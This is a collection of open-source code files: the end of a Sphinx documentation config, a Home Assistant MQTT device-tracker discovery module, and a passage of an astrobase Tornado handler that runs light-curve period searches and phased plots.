#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'atmospy', u'atmospy Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'atmospy', u'atmospy Documentation',
author, 'atmospy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| {
"content_hash": "bbb4c9b37c344037e06ecac2165071d0",
"timestamp": "",
"source": "github",
"line_count": 350,
"max_line_length": 80,
"avg_line_length": 31.534285714285716,
"alnum_prop": 0.7063513635951798,
"repo_name": "dhhagan/atmospy",
"id": "6662abee72068440c81cf548d60ef2f27d9c971c",
"size": "11457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/source/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "33787"
},
{
"name": "Python",
"bytes": "22861"
}
],
"symlink_target": ""
} |
"""Support for tracking MQTT enabled devices identified through discovery."""
import logging
import voluptuous as vol
from homeassistant.components import device_tracker
from homeassistant.components.device_tracker import SOURCE_TYPES
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.const import (
ATTR_GPS_ACCURACY,
ATTR_LATITUDE,
ATTR_LONGITUDE,
CONF_DEVICE,
CONF_ICON,
CONF_NAME,
CONF_UNIQUE_ID,
CONF_VALUE_TEMPLATE,
STATE_HOME,
STATE_NOT_HOME,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .. import (
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
subscription,
)
from ... import mqtt
from ..const import ATTR_DISCOVERY_HASH, CONF_QOS, CONF_STATE_TOPIC
from ..debug_info import log_messages
from ..discovery import MQTT_DISCOVERY_NEW, clear_discovery_hash
_LOGGER = logging.getLogger(__name__)
CONF_PAYLOAD_HOME = "payload_home"
CONF_PAYLOAD_NOT_HOME = "payload_not_home"
CONF_SOURCE_TYPE = "source_type"
PLATFORM_SCHEMA_DISCOVERY = (
mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
vol.Optional(CONF_ICON): cv.icon,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_PAYLOAD_HOME, default=STATE_HOME): cv.string,
vol.Optional(CONF_PAYLOAD_NOT_HOME, default=STATE_NOT_HOME): cv.string,
vol.Optional(CONF_SOURCE_TYPE): vol.In(SOURCE_TYPES),
vol.Optional(CONF_UNIQUE_ID): cv.string,
}
)
.extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
.extend(mqtt.MQTT_JSON_ATTRS_SCHEMA.schema)
)
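# An illustrative MQTT discovery payload that satisfies the schema above; the
# topic, name and payload values are made up for the example:
#
#   {
#       "state_topic": "location/paulus/phone",
#       "name": "paulus_phone",
#       "payload_home": "home",
#       "payload_not_home": "not_home",
#       "source_type": "bluetooth"
#   }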
async def async_setup_entry_from_discovery(hass, config_entry, async_add_entities):
"""Set up MQTT device tracker dynamically through MQTT discovery."""
async def async_discover(discovery_payload):
"""Discover and add an MQTT device tracker."""
discovery_data = discovery_payload.discovery_data
try:
config = PLATFORM_SCHEMA_DISCOVERY(discovery_payload)
await _async_setup_entity(
hass, config, async_add_entities, config_entry, discovery_data
)
except Exception:
clear_discovery_hash(hass, discovery_data[ATTR_DISCOVERY_HASH])
raise
async_dispatcher_connect(
hass, MQTT_DISCOVERY_NEW.format(device_tracker.DOMAIN, "mqtt"), async_discover
)
async def _async_setup_entity(
hass, config, async_add_entities, config_entry=None, discovery_data=None
):
"""Set up the MQTT Device Tracker entity."""
async_add_entities([MqttDeviceTracker(hass, config, config_entry, discovery_data)])
class MqttDeviceTracker(
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
TrackerEntity,
):
"""Representation of a device tracker using MQTT."""
def __init__(self, hass, config, config_entry, discovery_data):
"""Initialize the tracker."""
self.hass = hass
self._location_name = None
self._sub_state = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
device_config = config.get(CONF_DEVICE)
MqttAttributes.__init__(self, config)
MqttAvailability.__init__(self, config)
MqttDiscoveryUpdate.__init__(self, discovery_data, self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config, config_entry)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_DISCOVERY(discovery_payload)
self._setup_from_config(config)
await self.attributes_discovery_update(config)
await self.availability_discovery_update(config)
await self.device_info_discovery_update(config)
await self._subscribe_topics()
self.async_write_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
value_template = self._config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
value_template.hass = self.hass
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
@callback
@log_messages(self.hass, self.entity_id)
def message_received(msg):
"""Handle new MQTT messages."""
payload = msg.payload
value_template = self._config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
payload = value_template.async_render_with_possible_json_value(payload)
if payload == self._config[CONF_PAYLOAD_HOME]:
self._location_name = STATE_HOME
elif payload == self._config[CONF_PAYLOAD_NOT_HOME]:
self._location_name = STATE_NOT_HOME
else:
self._location_name = msg.payload
self.async_write_ha_state()
self._sub_state = await subscription.async_subscribe_topics(
self.hass,
self._sub_state,
{
"state_topic": {
"topic": self._config[CONF_STATE_TOPIC],
"msg_callback": message_received,
"qos": self._config[CONF_QOS],
}
},
)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await subscription.async_unsubscribe_topics(
self.hass, self._sub_state
)
await MqttAttributes.async_will_remove_from_hass(self)
await MqttAvailability.async_will_remove_from_hass(self)
await MqttDiscoveryUpdate.async_will_remove_from_hass(self)
@property
def icon(self):
"""Return the icon of the device."""
return self._config.get(CONF_ICON)
@property
def latitude(self):
"""Return latitude if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_LATITUDE in self.device_state_attributes
):
return self.device_state_attributes[ATTR_LATITUDE]
return None
@property
def location_accuracy(self):
"""Return location accuracy if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_GPS_ACCURACY in self.device_state_attributes
):
return self.device_state_attributes[ATTR_GPS_ACCURACY]
return None
@property
def longitude(self):
"""Return longitude if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_LONGITUDE in self.device_state_attributes
):
return self.device_state_attributes[ATTR_LONGITUDE]
return None
@property
def location_name(self):
"""Return a location name for the current location of the device."""
return self._location_name
@property
def name(self):
"""Return the name of the device tracker."""
return self._config.get(CONF_NAME)
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def source_type(self):
"""Return the source type, eg gps or router, of the device."""
return self._config.get(CONF_SOURCE_TYPE)
| {
"content_hash": "1005f8759d2fc987d1b4501a6419d7f0",
"timestamp": "",
"source": "github",
"line_count": 230,
"max_line_length": 87,
"avg_line_length": 34.082608695652176,
"alnum_prop": 0.6387294297742059,
"repo_name": "tboyce021/home-assistant",
"id": "4de2ae4fa6d576e0f3403e18a9e557c5d296a819",
"size": "7839",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/mqtt/device_tracker/schema_discovery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "28861968"
},
{
"name": "Shell",
"bytes": "4815"
}
],
"symlink_target": ""
} |
'''
These are Tornado handlers for serving checkplots and operating on them.
'''
####################
## SYSTEM IMPORTS ##
####################
import os
import os.path
import base64
import logging
from io import BytesIO as StrIO
import numpy as np
import pickle
import json
from .checkplotserver_handlers import FrontendEncoder
# this replaces the default encoder and makes it so Tornado will do the right
# thing when it converts dicts to JSON when a
# tornado.web.RequestHandler.write(dict) is called.
json._default_encoder = FrontendEncoder()
#############
## LOGGING ##
#############
# get a logger
LOGGER = logging.getLogger(__name__)
#####################
## TORNADO IMPORTS ##
#####################
import tornado.ioloop
import tornado.httpserver
import tornado.web
from tornado.escape import xhtml_escape, url_unescape
from tornado import gen
###################
## LOCAL IMPORTS ##
###################
from .. import lcmath
from ..checkplot.pkl_io import (
_read_checkplot_picklefile,
_write_checkplot_picklefile
)
from ..checkplot.pkl_utils import _pkl_periodogram, _pkl_phased_magseries_plot
from .. import lcfit
from .checkplotserver_handlers import CPTOOLMAP
#############################
## CHECKPLOT TOOL HANDLERS ##
#############################
class LCToolHandler(tornado.web.RequestHandler):
'''This handles dispatching light curve analysis tasks.
GET requests run the light curve tools specified in the URI with arguments
as specified in the args to the URI.
POST requests write the results to the JSON file. The frontend JS object is
automatically updated by the frontend code.
'''
def initialize(self, currentdir, assetpath, cplist,
cplistfile, executor, readonly):
'''
This handles initial setup of the `RequestHandler`.
'''
self.currentdir = currentdir
self.assetpath = assetpath
self.currentproject = cplist
self.cplistfile = cplistfile
self.executor = executor
self.readonly = readonly
@gen.coroutine
def get(self, cpfile):
'''This handles a GET request to run a specified LC tool.
Parameters
----------
cpfile : str
This is the checkplot file to run the tool on.
Returns
-------
str
Returns a JSON response.
Notes
-----
The URI structure is::
/tools/<cpfile>?[args]
where args are::
?lctool=<lctool>&argkey1=argval1&argkey2=argval2&...
&forcereload=true <- if this is present, then reload values from
original checkplot.
&objectid=<objectid>
`lctool` is one of the strings below
Period search functions::
psearch-gls: run Lomb-Scargle with given params
psearch-bls: run BLS with given params
psearch-pdm: run phase dispersion minimization with given params
psearch-aov: run analysis-of-variance with given params
psearch-mav: run analysis-of-variance (multi-harm) with given params
psearch-acf: run ACF period search with given params
psearch-win: run spectral window function search with given params
Arguments recognized by all period-search functions are::
startp=XX
endp=XX
magsarefluxes=True|False
autofreq=True|False
stepsize=XX
Variability characterization functions::
var-varfeatures: gets the variability features from the checkplot or
recalculates if they're not present
var-prewhiten: pre-whitens the light curve with a sinusoidal signal
var-masksig: masks a given phase location with given width from the
light curve
Light curve manipulation functions ::
phasedlc-newplot: make phased LC with new provided period/epoch
lcfit-fourier: fit a Fourier function to the phased LC
lcfit-spline: fit a spline function to the phased LC
lcfit-legendre: fit a Legendre polynomial to the phased LC
lcfit-savgol: fit a Savitsky-Golay polynomial to the phased LC
FIXME: figure out how to cache the results of these functions
temporarily and save them back to the checkplot after we click on save
in the frontend.
TODO: look for a checkplot-blah-blah.pkl-cps-processing file in the same
place as the usual pickle file. if this exists and is newer than the pkl
file, load it instead. Or have a checkplotdict['cpservertemp'] item.
'''
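        # An illustrative request matching the URI scheme documented above;
        # the base64-encoded checkplot filename and the argument values are
        # made up:
        #
        #   /tools/<base64-checkplot-filename>?lctool=psearch-gls&startp=0.5&endp=100.0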
if cpfile:
self.cpfile = (
xhtml_escape(base64.b64decode(url_unescape(cpfile)))
)
# see if this plot is in the current project
if self.cpfile in self.currentproject['checkplots']:
# make sure this file exists
cpfpath = os.path.join(
os.path.abspath(os.path.dirname(self.cplistfile)),
self.cpfile
)
# if we can't find the pickle, quit immediately
if not os.path.exists(cpfpath):
msg = "couldn't find checkplot %s" % cpfpath
LOGGER.error(msg)
resultdict = {'status':'error',
'message':msg,
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
###########################
# now parse the arguments #
###########################
# check if we have to force-reload
forcereload = self.get_argument('forcereload',False)
if forcereload and xhtml_escape(forcereload):
forcereload = True if forcereload == 'true' else False
# get the objectid
cpobjectid = self.get_argument('objectid',None)
# get the light curve tool to use
lctool = self.get_argument('lctool', None)
# preemptive dict to fill out
resultdict = {'status':None,
'message':None,
'readonly':self.readonly,
'result':None}
# check if the lctool arg is provided
if lctool:
lctool = xhtml_escape(lctool)
lctoolargs = []
lctoolkwargs = {}
# check if this lctool is OK and has all the required args
if lctool in CPTOOLMAP:
try:
# all args should have been parsed
# successfully. parse the kwargs now
for xkwarg, xkwargtype, xkwargdef in zip(
CPTOOLMAP[lctool]['kwargs'],
CPTOOLMAP[lctool]['kwargtypes'],
CPTOOLMAP[lctool]['kwargdefs']
):
# get the kwarg
if xkwargtype is list:
wbkwarg = self.get_arguments(xkwarg)
if len(wbkwarg) > 0:
wbkwarg = [url_unescape(xhtml_escape(x))
for x in wbkwarg]
else:
wbkwarg = None
else:
wbkwarg = self.get_argument(xkwarg, None)
if wbkwarg is not None:
wbkwarg = url_unescape(
xhtml_escape(wbkwarg)
)
LOGGER.info('xkwarg = %s, wbkwarg = %s' %
(xkwarg, repr(wbkwarg)))
# if it's None, sub with the default
if wbkwarg is None:
wbkwarg = xkwargdef
# otherwise, cast it to the required type
else:
# special handling for lists of floats
if xkwargtype is list:
wbkwarg = [float(x) for x in wbkwarg]
# special handling for booleans
elif xkwargtype is bool:
if wbkwarg == 'false':
wbkwarg = False
elif wbkwarg == 'true':
wbkwarg = True
else:
wbkwarg = xkwargdef
# usual casting for other types
else:
wbkwarg = xkwargtype(wbkwarg)
# update the lctools kwarg dict
# make sure to remove any [] from the kwargs
# this was needed to parse the input query
# string correctly
if xkwarg.endswith('[]'):
xkwarg = xkwarg.rstrip('[]')
lctoolkwargs.update({xkwarg:wbkwarg})
except Exception:
LOGGER.exception('lctool %s, kwarg %s '
'will not work' %
(lctool, xkwarg))
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s, kwarg %s '
'will not work' %
(lctool, xkwarg)
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
                # if the tool is not in CPTOOLMAP
else:
LOGGER.error('lctool %s, does not exist' % lctool)
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s does not exist' % lctool
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if no lctool arg is provided
else:
LOGGER.error('lctool argument not provided')
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool argument not provided'
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
##############################################
## NOW WE'RE READY TO ACTUALLY DO SOMETHING ##
##############################################
LOGGER.info('loading %s...' % cpfpath)
# this loads the actual checkplot pickle
cpdict = yield self.executor.submit(
_read_checkplot_picklefile, cpfpath
)
# we check for the existence of a cpfpath + '-cpserver-temp'
# file first. this is where we store stuff before we write it
# back to the actual checkplot.
tempfpath = cpfpath + '-cpserver-temp'
# load the temp checkplot if it exists
if os.path.exists(tempfpath):
tempcpdict = yield self.executor.submit(
_read_checkplot_picklefile, tempfpath
)
# if it doesn't exist, read the times, mags, errs from the
# actual checkplot in prep for working on it
else:
tempcpdict = {
'objectid':cpdict['objectid'],
'magseries':{
'times':cpdict['magseries']['times'],
'mags':cpdict['magseries']['mags'],
'errs':cpdict['magseries']['errs'],
}
}
# if we're not forcing a rerun from the original checkplot dict
if not forcereload:
cptimes, cpmags, cperrs = (
tempcpdict['magseries']['times'],
tempcpdict['magseries']['mags'],
tempcpdict['magseries']['errs'],
)
LOGGER.info('forcereload = False')
# otherwise, reload the original times, mags, errs
else:
cptimes, cpmags, cperrs = (cpdict['magseries']['times'],
cpdict['magseries']['mags'],
cpdict['magseries']['errs'])
LOGGER.info('forcereload = True')
# collect the args
for xarg, xargtype in zip(CPTOOLMAP[lctool]['args'],
CPTOOLMAP[lctool]['argtypes']):
# handle special args
if xarg is None:
lctoolargs.append(None)
elif xarg == 'times':
lctoolargs.append(cptimes)
elif xarg == 'mags':
lctoolargs.append(cpmags)
elif xarg == 'errs':
lctoolargs.append(cperrs)
# handle other args
else:
try:
if xargtype is list:
wbarg = self.get_arguments(xarg)
else:
wbarg = url_unescape(
xhtml_escape(
self.get_argument(xarg, None)
)
)
# cast the arg to the required type
# special handling for lists
if xargtype is list:
wbarg = [float(x) for x in wbarg]
# special handling for epochs that can be optional
elif xargtype is float and xarg == 'varepoch':
try:
wbarg = xargtype(wbarg)
except Exception:
wbarg = None
# usual casting for other types
else:
wbarg = xargtype(wbarg)
lctoolargs.append(wbarg)
except Exception:
LOGGER.exception('lctool %s, arg %s '
'will not work' %
(lctool, xarg))
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s, arg %s '
'will not work' %
(lctool, xarg)
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
LOGGER.info(lctool)
LOGGER.info(lctoolargs)
LOGGER.info(lctoolkwargs)
############################
## handle the lctools now ##
############################
# make sure the results aren't there already.
# if they are and force-reload is not True,
# just return them instead.
resloc = CPTOOLMAP[lctool]['resloc']
# TODO: figure out a way to make the dispatched tasks
# cancellable. This can probably be done by having a global
# TOOLQUEUE object that gets imported on initialize(). In this
# object, we could put in key:vals like so:
#
# TOOLQUEUE['lctool-<toolname>-cpfpath'] = (
# yield self.executor.submit(blah, *blah_args, **blah_kwargs)
# )
#
# then we probably need some sort of frontend AJAX call that
# enqueues things and can then cancel stuff from the queue. see
# stuff we need to figure out:
# - if the above scheme actually yields so we remain async
# - if the Future object supports cancellation
# - if the Future object that isn't resolved actually works
# get the objectid. we'll send this along with every
# result. this should handle the case of the current objectid
# not being the same as the objectid being looked at by the
# user. in effect, this will allow the user to launch a
# long-running process and come back to it later since the
# frontend will load the older results when they are complete.
objectid = cpdict['objectid']
# if lctool is a periodogram method
if lctool in ('psearch-gls',
'psearch-bls',
'psearch-pdm',
'psearch-aov',
'psearch-mav',
'psearch-acf',
'psearch-win'):
lspmethod = resloc[0]
# if we can return the results from a previous run
if (lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict) and
(not forcereload)):
# for a periodogram method, we need the
# following items
bestperiod = (
tempcpdict[lspmethod]['bestperiod']
)
nbestperiods = (
tempcpdict[lspmethod]['nbestperiods']
)
nbestlspvals = (
tempcpdict[lspmethod]['nbestlspvals']
)
periodogram = (
tempcpdict[lspmethod]['periodogram']
)
# get the first phased LC plot and its period
# and epoch
phasedlc0plot = (
tempcpdict[lspmethod][0]['plot']
)
phasedlc0period = float(
tempcpdict[lspmethod][0]['period']
)
phasedlc0epoch = float(
tempcpdict[lspmethod][0]['epoch']
)
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
'nbestperiods':nbestperiods,
'periodogram':periodogram,
'bestperiod':bestperiod,
'nbestpeaks':nbestlspvals,
'phasedlc0':{
'plot':phasedlc0plot,
'period':phasedlc0period,
'epoch':phasedlc0epoch,
}
}
}
self.write(resultdict)
self.finish()
# otherwise, we have to rerun the periodogram method
else:
# see if sigclip is set. if so, then do the sigclip on
# the times, mags, errs
if lctoolkwargs['sigclip'] is not None:
wtimes, wmags, werrs = lcmath.sigclip_magseries(
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
sigclip=lctoolkwargs['sigclip'],
magsarefluxes=lctoolkwargs['magsarefluxes']
)
lctoolargs[0] = wtimes
lctoolargs[1] = wmags
lctoolargs[2] = werrs
#
# process the LC filters now
#
# see if the lctimefilters are set
if lctoolkwargs['lctimefilters']:
wtimes, wmags, werrs = (lctoolargs[0],
lctoolargs[1],
lctoolargs[2])
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lctimefilters']
filters = filterstr.split(',')
filters = [
x.strip().lstrip('(').rstrip(')').strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
(((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
lctoolargs[0] = wtimes[filterind]
lctoolargs[1] = wmags[filterind]
lctoolargs[2] = werrs[filterind]
# see if the lcmagfilters are set
if lctoolkwargs['lcmagfilters']:
wtimes, wmags, werrs = (lctoolargs[0],
lctoolargs[1],
lctoolargs[2])
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the mag filter strings
filterstr = lctoolkwargs['lcmagfilters']
filters = filterstr.split(',')
filters = [
x.strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
(wmags < filt_hi) &
(wmags > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
((wmags < filt_hi) &
(wmags > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
lctoolargs[0] = wtimes[filterind]
lctoolargs[1] = wmags[filterind]
lctoolargs[2] = werrs[filterind]
# at the end of processing, remove from lctoolkwargs
# since the pfmethod doesn't know about this
del lctoolkwargs['lctimefilters']
del lctoolkwargs['lcmagfilters']
#
# now run the period finder and get results
#
lctoolfunction = CPTOOLMAP[lctool]['func']
# run the period finder
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# get what we need out of funcresults when it
# returns.
nbestperiods = funcresults['nbestperiods']
nbestlspvals = funcresults['nbestlspvals']
bestperiod = funcresults['bestperiod']
# generate the periodogram png
pgramres = yield self.executor.submit(
_pkl_periodogram,
funcresults,
)
# generate the phased LCs. we show these in the frontend
# along with the periodogram.
phasedlcargs0 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[0],
'min')
if len(nbestperiods) > 1:
phasedlcargs1 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[1],
'min')
else:
phasedlcargs1 = None
if len(nbestperiods) > 2:
phasedlcargs2 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[2],
'min')
else:
phasedlcargs2 = None
# here, we set a bestperiodhighlight to distinguish this
# plot from the ones existing in the checkplot already
phasedlckwargs = {
'xliminsetmode':False,
'magsarefluxes':lctoolkwargs['magsarefluxes'],
'bestperiodhighlight':'#defa75',
}
# dispatch the plot functions
phasedlc0 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs0,
**phasedlckwargs
)
if phasedlcargs1 is not None:
phasedlc1 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs1,
**phasedlckwargs
)
else:
phasedlc1 = None
if phasedlcargs2 is not None:
phasedlc2 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs2,
**phasedlckwargs
)
else:
phasedlc2 = None
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
tempcpdict[lspmethod] = {
'periods':funcresults['periods'],
'lspvals':funcresults['lspvals'],
'bestperiod':funcresults['bestperiod'],
'nbestperiods':funcresults['nbestperiods'],
'nbestlspvals':funcresults['nbestlspvals'],
'periodogram':(
pgramres[lspmethod]['periodogram']
),
0:phasedlc0,
}
if phasedlc1 is not None:
tempcpdict[lspmethod][1] = phasedlc1
if phasedlc2 is not None:
tempcpdict[lspmethod][2] = phasedlc2
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
'because readonly = True'
)
#
# assemble the return dict
#
# the periodogram
periodogram = pgramres[lspmethod]['periodogram']
# phasedlc plot, period, and epoch for best 3 peaks
phasedlc0plot = phasedlc0['plot']
phasedlc0period = float(phasedlc0['period'])
phasedlc0epoch = float(phasedlc0['epoch'])
if phasedlc1 is not None:
phasedlc1plot = phasedlc1['plot']
phasedlc1period = float(phasedlc1['period'])
phasedlc1epoch = float(phasedlc1['epoch'])
if phasedlc2 is not None:
phasedlc2plot = phasedlc2['plot']
phasedlc2period = float(phasedlc2['period'])
phasedlc2epoch = float(phasedlc2['epoch'])
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
'nbestperiods':nbestperiods,
'nbestpeaks':nbestlspvals,
'periodogram':periodogram,
'bestperiod':bestperiod,
'phasedlc0':{
'plot':phasedlc0plot,
'period':phasedlc0period,
'epoch':phasedlc0epoch,
},
}
}
if phasedlc1 is not None:
resultdict['result'][lspmethod]['phasedlc1'] = {
'plot':phasedlc1plot,
'period':phasedlc1period,
'epoch':phasedlc1epoch,
}
if phasedlc2 is not None:
resultdict['result'][lspmethod]['phasedlc2'] = {
'plot':phasedlc2plot,
'period':phasedlc2period,
'epoch':phasedlc2epoch,
}
# return to frontend
self.write(resultdict)
self.finish()
# if the lctool is a call to the phased LC plot itself
# this requires lots of parameters
# these should all be present in the frontend
elif lctool == 'phasedlc-newplot':
lspmethod = lctoolargs[1]
periodind = lctoolargs[2]
# if we can return the results from a previous run
if (not forcereload and lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict) and
periodind in tempcpdict[lspmethod] and
isinstance(tempcpdict[lspmethod][periodind], dict)):
# we get phased LC at periodind from a previous run
phasedlc = tempcpdict[lspmethod][periodind]
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
retkey = 'phasedlc%s' % periodind
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
retkey:phasedlc
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
# add the highlight to distinguish this plot from usual
# checkplot plots
# full disclosure: http://c0ffee.surge.sh/
lctoolkwargs['bestperiodhighlight'] = '#defa75'
# set the input periodind to -1 to make sure we still
# have the highlight on the plot. we use the correct
# periodind when returning
lctoolargs[2] = -1
# see if sigclip is set. if so, then do the sigclip on
# the times, mags, errs
if lctoolkwargs['sigclip'] is not None:
stimes, smags, serrs = lcmath.sigclip_magseries(
lctoolargs[3],
lctoolargs[4],
lctoolargs[5],
sigclip=lctoolkwargs['sigclip'],
magsarefluxes=lctoolkwargs['magsarefluxes']
)
else:
stimes, smags, serrs = (lctoolargs[3],
lctoolargs[4],
lctoolargs[5])
#
# process the LC filters now
#
# see if the lctimefilters are set
if lctoolkwargs['lctimefilters']:
wtimes, wmags, werrs = stimes, smags, serrs
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lctimefilters']
filters = filterstr.split(',')
filters = [
x.strip().lstrip('(').rstrip(')').strip()
for x in filters
]
for filt in filters:
try:
